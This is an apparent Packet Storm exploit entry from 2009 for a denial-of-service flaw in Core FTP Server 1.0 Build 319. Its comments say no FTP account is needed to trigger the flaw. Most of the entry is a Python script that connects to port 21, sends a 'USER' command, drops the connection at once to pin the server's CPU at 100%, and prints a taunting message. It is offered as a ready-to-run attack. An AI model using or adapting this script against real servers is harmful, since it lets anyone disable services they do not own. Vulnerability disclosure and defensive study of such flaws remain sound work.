Core FTP Server 1.0 Build 319 Denial Of Service

2009-12-05T00:00:00
ID PACKETSTORM:83469
Type packetstorm
Reporter Mert SARICA
Modified 2009-12-05T00:00:00

Description

                                        
                                            `  
view source  
print?  
# Note: FTP account is not required for exploitation  
# http://www.mertsarica.com  
# I discovered a denial-of-service vulnerability on Core FTP Server product.  
# When you send "USER test\r\n" and then kills the connection  
# immediately, cpu increases to 100% and stays at that level until you  
# stop the ftp service.  
  
  
import socket, sys  
  
HOST = 'localhost'   
PORT = 21   
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
s.connect((HOST, PORT))  
except:  
print "Connection error"  
sys.exit(1)  
  
try:  
s.send('USER MS\r\n') # magic packet  
s.close()  
print("Very good, young padawan, but you still have much to learn...")  
except:  
print "Connection error"  
sys.exit(1)  
  
`